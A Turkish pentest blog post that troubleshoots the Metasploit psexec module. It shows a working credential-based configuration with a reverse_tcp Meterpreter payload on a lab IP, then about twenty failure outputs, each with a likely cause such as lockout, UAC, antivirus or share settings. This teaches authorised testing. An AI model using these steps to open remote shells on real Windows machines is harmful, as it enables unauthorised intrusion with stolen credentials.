MSF Psexec İstismar Modülü Çalıştırılırken Alınabilecek Hatalar Özelinde MSF SMB İstisnai Durumları ve Bu Hatalı Durumların Muhtemel Sebepleri

0
2062
views
Sızma testleri sırasında, bir şekilde elde edilen kimlik bilgileri (kullanıcı adı ve parola / parola özeti) kullanılarak Windows bilgisayarlara erişim sağlanmaya çalışılır. Erişim bilgileri (IP, kullanıcı adı, parolası veya parola özeti) elde edilmiş bir Windows bilgisayara MSF psexec istismar modülü kullanılarak Meterpreter bağlantısı ile erişim sağlanabilir. Ancak bazı durumlarda, MSF psexec istismar modülü (veya diğer MSF modülleri) çalıştırılırken beklendiği gibi çalışmayabilir. Bu durumun bir çok sebebi olabilir. Bu yazıda MSF psexec istismar modülü çalıştırılırken alınabilecek hatalar listelenecek ve bu hataların gerçekleşme sebepleri listelenecektir.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

Standart bir MSF psexec modülü aşağıdaki gibi ayarlanabilir ve çalıştırılabilir.

msf exploit(psexec) > show options

Module options (exploit/windows/smb/psexec):

Name Current Setting Required Description
—- ————— ——– ———–
RHOST 192.168.2.7 yes The target address
RPORT 445 yes Set the SMB service port
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,…) or a normal read/write folder share
SMBDomain WORKGROUP no The Windows domain to use for authentication
SMBPass Aa123456 no The password for the specified username
SMBUser Ahmet no The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
—- ————— ——– ———–
EXITFUNC process yes Exit technique (accepted: seh, thread, process, none)
LHOST 192.168.2.2 yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name
— —-
0 Automatic

msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.2.22:4444
[*] Connecting to the server…
[*] Authenticating to 192.168.2.7:445|WORKGROUP as user ‘Ahmet’…
[*] Uploading payload…
[*] Created \xhSnxfvL.exe…
[*] Deleting \xhSnxfvL.exe…
[*] Sending stage (769536 bytes) to 192.168.2.7
[*] Meterpreter session 1 opened (192.168.2.22:4444 -> 192.168.2.7:49301) at 2014-12-14 15:32:12 -0500

meterpreter >

Ancak bazı durumlarda bu işlem başarısız olabilmektedir. Aşağıdaki her maddede oluşabilecek hatalardan bir kısmı görülmektedir. Bu hatalar sonucunda modülün çıktısı ve muhtemel sebepleri aşağıdaki gibi listelenebilir.

 

Rex::AddressInUse The address is already in use

msf exploit(psexec) > exploit

[-] Handler failed to bind to 192.168.2.22:4444
[-] Handler failed to bind to 0.0.0.0:4444
[-] Exploit failed: Rex::AddressInUse The address is already in use (0.0.0.0:4444).

Muhtemel Sebebi: Dinleyen port kullanıldığı için handler açılamamıştır.

 

Rex::ConnectionTimeout The connection timed out

msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.2.22:4444
[*] Connecting to the server…
[-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (192.168.2.7:445).

Muhtemel Sebebi: Hedef bilgisayarda güvenlik duvarı açık olabilir veya aradaki bir cihaz tarafından engellenmiştir.

 

Rex::HostUnreachable The host was unreachable

msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.2.22:4444
[*] Connecting to the server…
[-] Exploit failed [unreachable]: Rex::HostUnreachable The host (192.168.2.250:445) was unreachable.

Muhtemel Sebebi: Hedef makineye erişilememiştir. Bilgisayar kapalı olabilir veya ağ üzerinden erişim engellenmiştir.

 

ConnectionRefused The connection was refused by the remote host

msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.2.22:4444
[*] Connecting to the server…
[-] Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (192.168.2.7:445).

Muhtemel Sebebi: File & Printer Sharing kapalıdır.

 

Exploit failed: ActiveRecord::RecordInvalid Validation failed: Data has already been taken

msf exploit(psexec) > exploit

[*] Started reverse TCP handler on 192.168.2.22:4444
[*] 192.168.2.7:445 – Connecting to the server…
[*] 192.168.2.7:445 – Authenticating to 192.168.2.7:445 as user ‘Ahmet’…
[-] 192.168.2.7:445 – Exploit failed: ActiveRecord::RecordInvalid Validation failed: Dat a has already been taken
[*] Exploit completed, but no session was created.

Muhtemel Sebebi:

 

Rex::Proto::SMB::Exceptions::LoginError Login Failed: execution expired

msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.2.22:4444
[*] Connecting to the server…
[*] Authenticating to 192.168.2.7:445|WORKGROUP as user ‘Ahmet’…
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: execution expired

Muhtemel Sebebi: Kimlik doğrulama sırasında hata olmuştur. Özellikle, etki alanındaki bir hesap ile MSF Psexec yapıldığında hedef bilgisayar DC makinesine erişim sağlayamazsa bu hata alınır.

 

Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE

msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.2.22:4444
[*] Connecting to the server…
[*] Authenticating to 192.168.2.7:445|WORKGROUP as user ‘Ahmet’…
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)

Muhtemel Sebebi: Kullanıcı adı veya parola hatalıdır.

 

Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_NETLOGON_NOT_STARTED

msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.2.22:4444
[*] Connecting to the server…
[*] Authenticating to 192.168.2.7:445|WORKGROUP as user ‘Ahmet’…
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_NETLOGON_NOT_STARTED (Command=115 WordCount=0)

Muhtemel Sebebi: Netlogon (veya Workgroup / Computer Browser) servisi devre dışıdır.

 

Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_ACCOUNT_DISABLED

msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.2.22:4444
[*] Connecting to the server…
[*] Authenticating to 192.168.2.7:445|WORKGROUP as user ‘Ahmet’…
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_ACCOUNT_DISABLED (Command=115 WordCount=0)

Muhtemel Sebebi: Hesap devre dışıdır.

 

Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_PASSWORD_MUST_CHANGE

msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.2.22:4444
[*] Connecting to the server…
[*] Authenticating to 192.168.2.7:445|WORKGROUP as user ‘Ahmet’…
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_PASSWORD_MUST_CHANGE (Command=115 WordCount=0)

Muhtemel Sebebi: Hesabın parolası değişmesi gereklidir. Parola politikasından ötürü gerekli süre (42 gün gibi) geçmiş olabilir.

 

Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_ACCOUNT_LOCKED_OUT

msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.2.22:4444
[*] Connecting to the server…
[*] Authenticating to 192.168.2.7:445|WORKGROUP as user ‘Ahmet’…
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_ACCOUNT_LOCKED_OUT (Command=115 WordCount=0)

Muhtemel Sebebi: Hesap kilitlenmiştir.

 

Rex::Proto::SMB::Exceptions::LoginError Login Failed: Connection reset by peer

msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.2.22:4444
[*] Connecting to the server…
[*] Authenticating to 192.168.2.7:445|WORKGROUP as user ‘Ahmet’…
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: Connection reset by peer

Muhtemel Sebebi: Server servisi kapalı olduğu için bağlantı talebine RST gönderilmiştir.

 

Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_ACCOUNT_RESTRICTION

msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.2.22:4444
[*] Connecting to the server…
[*] Authenticating to 192.168.2.7:4444|WORKGROUP as user ‘Ahmet’…
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_ACCOUNT_RESTRICTION (Command=115 WordCount=0)

Muhtemel Sebebi: Hesabın kimlik bilgileri (kullanıcı adı / parola) doğru olmasına rağmen, bu hesabın parolasının boş olması sebebi ile ağ üzerinden bilgisayara erişim gerçekleştirilememektedir. Bunun sebebi de, grup ilkelerindeki “Accounts: Limit local account use of blank passwords to console logon only” ayarının etkin olmasıdır.

 

Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_TYPE_NOT_GRANTED

msf exploit(psexec) > exploit

[*] Started reverse handler on 172.16.67.120:4444
[*] Connecting to the server…
[*] Authenticating to 172.16.67.182:445|WORKGROUP as user ‘Tubitak’…
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_TYPE_NOT_GRANTED (Command=115 WordCount=0)

Muhtemel Sebebi: Hesabın kimlik bilgileri (kullanıcı adı / parola) doğru olmasına rağmen, bu hesap ile ağ üzerinden bilgisayara erişim gerçekleştirilememektedir. Örneğin, grup ilkelerindeki “Deny access to this computer from the network” ilkesinde bu hesap bulunuyor olabilir.

 

Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_TRUSTED_RELATIONSHIP_FAILURE

msf exploit(psexec) > exploit

[*] Started reverse handler on 172.16.67.120:4444
[*] Connecting to the server…
[*] Authenticating to 172.16.67.182:445|WORKGROUP as user ‘Tubitak’…
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_TRUSTED_RELATIONSHIP_FAILURE (Command=115 WordCount=0)

Muhtemel Sebebi: Bilgisayar etki alanından düşmüş olabilir.

 

Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_BAD_NETWORK_NAME

msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.2.22:4444
[*] Connecting to the server…
[*] Authenticating to 192.168.2.7:445|WORKGROUP as user ‘Ahmet’…
[*] Uploading payload…
[-] Exploit failed: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_BAD_NETWORK_NAME (Command=117 WordCount=0)

Muhtemel Sebebi: Yönetimsel paylaşım (ADMIN$) kapalıdır. Veya, hatalı bir paylaşım dizini (C$\Useers gibi) belirtilmiştir.

 

Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED

msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.2.22:4444
[*] Connecting to the server…
[*] Authenticating to 192.168.2.7:445|WORKGROUP as user ‘Ahmet’…
[*] Uploading payload…
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)

Muhtemel Sebebi: Yetkilendirme yetersizdir. Hesap yerel yönetici olmayabilir veya UAC etkin olabilir.

 

Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_OBJECT_PATH_SYNTAX_BAD

msf exploit(psexec) > exploit

[*] Started reverse handler on 172.16.67.120:4444
[*] Connecting to the server…
[*] Authenticating to 172.16.67.182:445|WORKGROUP as user ‘Hesap1’…
[*] Uploading payload…
[-] Exploit failed: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_OBJECT_PATH_SYNTAX_BAD (Command=45 WordCount=0)

Muhtemel Sebebi: Paylaşım olarak IPC$ gibi hatalı bir dizin belirtilmiştir.

 

Atılan Payload Zararlısı Silindikten Sonra: Hata Mesajı Yok

msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.2.22:4444
[*] Connecting to the server…
[*] Authenticating to 192.168.2.7:445|WORKGROUP as user ‘Ahmet’…
[*] Uploading payload…
[*] Created \dwgbefJq.exe…
[*] Deleting \dwgbefJq.exe…

Muhtemel Sebebi: Yönlendirme veya başka bir sebep dolayısıyla kurban bilgisayarından saldırgan bilgisayarına bağlantı oluşmamaktadır. İlgili paylaşıma (bu örnek için ADMIN$, ancak services.exe’ye erişimi olmayan diğer paylaşımlar için daha mantıklıdır) yazma/okuma izni olmasına rağmen servis başlatma yetkisi olmadığı durumda da bu hata alınabilmektedir.

 

Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND

msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.2.22:4444
[*] Connecting to the server…
[*] Authenticating to 192.168.2.7:445|WORKGROUP as user ‘Ahmet’…
[*] Uploading payload…
[*] Created \quVtTqcy.exe…
[*] Deleting \quVtTqcy.exe…
[-] Exploit failed: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=6 WordCount=0)

Muhtemel Sebebi: Antivirüs gibi bir sistem dolayısıyla zararlı yazılım uygun şekilde çalışamamıştır.

 

Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_SHARING_VIOLATION

msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.2.22:4444
[*] Connecting to the server…
[*] Authenticating to 192.168.2.7:445|WORKGROUP as user ‘Ahmet’…
[*] Uploading payload…
[*] Created \rcErXTSH.exe…
[*] Deleting \rcErXTSH.exe…
[-] Exploit failed: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_SHARING_VIOLATION (Command=6 WordCount=0)

Muhtemel Sebebi: Antivirüs gibi bir sistem dolayısıyla veya dosya açma (Open) işlemi sırasında işletim sisteminden kaynaklı bir hatadan (oplocks diye adlandırılan çoklu dosya erişimlerinde işletim sisteminin dosyanı kilitleme işlemi) dolayı zararlı yazılım uygun şekilde çalışamamıştır.

Not: Bazı durumlarda (işletim sistemindeki hata sebebiyle dosya açma işlemi gerçekleştirilemediği durum gibi), STATUS_SHARING_VIOLATION hata mesajı alınmasına rağmen, Meterpreter oturumu elde edilebilir.

 

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.